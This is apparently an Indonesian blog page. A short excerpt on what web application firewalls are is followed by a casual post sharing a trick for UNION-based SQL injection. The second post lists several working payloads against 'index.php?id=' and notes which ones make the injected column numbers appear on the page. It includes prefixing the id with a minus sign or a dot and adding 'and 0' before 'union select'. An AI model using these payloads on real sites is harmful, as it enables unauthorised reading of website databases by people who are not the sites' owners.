Heboh WOW

Web Application Firewall      WAF ( Web Application Firewall ) adalah sebuah susunan filter yang berfungsi untuk menyaring, memonitor dan melakukan blocking terhadap data yang berasal dari client ke sebuah webserver. Untuk lebih mengenal waf maka perlu memahami tentang konsep firewall sebelum memahami WAF Mengenal Web Application Firewall      Firewall adalah sebuah konsep dimana sebuah appliance atau aplikasi yang bertugas untuk menyaring, memonitor dan melakukan blocking terhadap data yang melewati sebuah jaringan. Contoh firewall dalam networking adalah Cisco ASA, Sonicwall sedangkan WAF ini lebih banyak digunakan pada bagian filter aplikasi. Contoh penggunaan firewall untuk meredam paket data sampah seperti DDOS, Brute Force Attack, serangan botnet namun WAF memiliki filter khusus untuk meredam SQL Injection, XSS Attack dan sebagainya.      Jenis serangan terhadap sebuah website ini sangat banyak dan bermacam-macam namun ada 10 macam serangan yang paling banyak digunaka

     yap kali ini saya akan berbagi sedikit trick bypass magic number tidak muncul saat kita melakukan SQL injection ,      saya awalnya nemu sih dari artikel luar negeri , masih jarang yang tau kayaknya , sudah saya riset juga bnyak yang berhasil jadi saya re share di blog eheheh , langsung aja di coba simple nya kayak gini, di bagian sebelum number nya di beri parameter minus ( - ) atau bisa juga memakai parameter titik ( . ) index.php?id=1'+union+select+1,2,3--+-                      [ tidak muncul magic number ] index.php?id= - 1'+union+select+1,2,3--+-         [ muncul magic number ] index.php?id= . 1'+union+select+1,2,3--+-         [ muncul magic number ] jika masih tidak muncul bisa di tambahin parameter di bawah ini , di tambahkan sebelum +union+select contohnya  index.php?id= . 1'+union+select+1,2,3--+-                      [ tidak muncul magic number ] index.php?id= . 1'+ and+0 +union+select+1,2,3--+-         [ muncul magic number ] dan beberapa parameter